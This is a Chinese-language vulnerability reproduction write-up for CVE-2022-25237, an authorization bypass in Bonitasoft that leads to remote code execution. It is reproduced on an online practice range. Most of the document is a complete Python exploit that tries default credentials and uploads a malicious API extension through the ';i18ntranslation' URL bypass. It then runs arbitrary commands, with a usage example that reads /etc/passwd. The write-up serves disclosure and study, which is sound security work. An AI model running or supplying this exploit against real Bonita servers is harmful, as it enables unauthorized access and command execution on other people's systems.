鲁达 
Bonitasoft 是一个业务自动化平台,可以更轻松地在业务流程中构建、部署和管理自动化应用程序;Bonita 是一个用于业务流程自动化和优化的开源和可扩展平台。
2、漏洞概述在Bonitasoft Authorization漏洞版本,由于 API 授权过滤器中配置问题,通过精心构造的的字符串附加到 API URL,能够绕过权限认证。拥有普通用户权限的攻击者在绕过权限认证后,将恶意代码部署到服务器上,进行远程代码执行。
3、影响范围For community(社区版): 2022.1-u0 (7.14.0) 以下
For subscription(订阅版): 2022.1-u0 (7.14.0) 以下
2021.2-u4 (7.13.4) 以下
2021.1-0307 (7.12.11) 以下
7.11.7 以下
4、环境搭建vulfocus在线靶场进行复现
5、利用流程1、访问靶场环境,使用默认账号密码:install/install 登录页面;
2、创建普通用户
3、利用某大佬写的poc
项目地址:CVEs/CVE-2022-25237 at master · RhinoSecurityLabs/CVEs · GitHub
# ## Information
# **Description:** This vulnerability allows authorization bypass and remote code exection in Bonitasoft web.
# **Versions Affected:** 2022.1
# **Version Fixed:**
# For community:
# - 2022.1-u0 (7.14.0)
# For subscription:
# - 2022.1-u0 (7.14.0)
# - 2021.2-u4 (7.13.4)
# - 2021.1-0307 (7.12.11)
# - 7.11.7
# **Researcher:** David Yesland (https://twitter.com/daveysec)
# **Disclosure Link:** https://rhinosecuritylabs.com/application-security/cve-2022-25237-bonitasoft-authorization-bypass/
# **NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2022-25237
import requests
import sys
class exploit:
try:
session = requests.session()
bonita_user = sys.argv[1]
bonita_password = sys.argv[2]
target_path = sys.argv[3]
cmd = sys.argv[4]
tempPath = ""
extension_id = ""
bonita_default_user = "install"
bonita_default_password = "install"
platform_default_user = "platformAdmin"
platform_default_password = "platform"
except:
print(f"Usage: python3 {sys.argv[0]} http://localhost:8080/bonita 'cat /etc/passwd'")
exit()
def try_default_logins():
req_url = f"{exploit.target_path}/loginservice"
req_cookies = {"x": "x"}
req_headers = {"Content-Type": "application/x-www-form-urlencoded"}
req_data = {"username": exploit.bonita_default_user, "password": exploit.bonita_default_password, "_l": "en"}
r = exploit.session.post(req_url, headers=req_headers, cookies=req_cookies, data=req_data)
if r.status_code == 401:
return False
# This does not seem to work when authenticating as platformAdmin, maybe it can though.
# req_url = f"{exploit.target_path}/platformloginservice"
# req_cookies = {"x": "x"}
# req_headers = {"Content-Type": "application/x-www-form-urlencoded"}
# req_data = {"username": exploit.platform_default_user, "password": exploit.platform_default_password, "_l": "en"}
# r = exploit.session.post(req_url, headers=req_headers, cookies=req_cookies, data=req_data)
# if r.status_code == 200:
# print(f"[+] Found default creds: {exploit.platform_default_user}:{exploit.platform_default_password}")
# return True
else:
print(f"[+] Found default creds: {exploit.bonita_default_user}:{exploit.bonita_default_password}")
return True
def login():
req_url = f"{exploit.target_path}/loginservice"
req_cookies = {"x": "x"}
req_headers = {"Content-Type": "application/x-www-form-urlencoded"}
req_data = {"username": exploit.bonita_user, "password": exploit.bonita_password, "_l": "en"}
r = exploit.session.post(req_url, headers=req_headers, cookies=req_cookies, data=req_data)
if r.status_code == 401:
print("[!] Could not get a valid session using those credentials.")
exit()
else:
print(f"[+] Authenticated with {exploit.bonita_user}:{exploit.bonita_password}")
def upload_api_extension():
req_url = f"{exploit.target_path}/API/pageUpload;i18ntranslation?action=add"
files=[
("file",("rce_api_extension.zip",open("rce_api_extension.zip",'rb'),'application/octet-stream'))
]
r = exploit.session.post(req_url, files=files)
exploit.tempPath = r.json()["tempPath"]
def activate_api_extension():
req_url = f"{exploit.target_path}/API/portal/page/;i18ntranslation"
req_headers = {"Content-Type": "application/json;charset=UTF-8"}
req_json={"contentName": "rce_api_extension.zip", "pageZip": exploit.tempPath}
r = exploit.session.post(req_url, headers=req_headers, json=req_json)
exploit.extension_id = r.json()["id"]
def delete_api_extension():
req_url = f"{exploit.target_path}/API/portal/page/{exploit.extension_id};i18ntranslation"
exploit.session.delete(req_url)
def run_cmd():
req_url = f"{exploit.target_path}/API/extension/rce?p=0&c=1&cmd={exploit.cmd}"
r = exploit.session.get(req_url)
print(r.json()["out"])
if not try_default_logins():
print("[!] Did not find default creds, trying supplied credentials.")
login()
upload_api_extension()
activate_api_extension()
try:
run_cmd()
except:
delete_api_extension()
delete_api_extension() 注意事项:CVE-2022-25237.py 和 rce_api_extension.zip文件放一个目录下
6、修复建议更新至安全版本。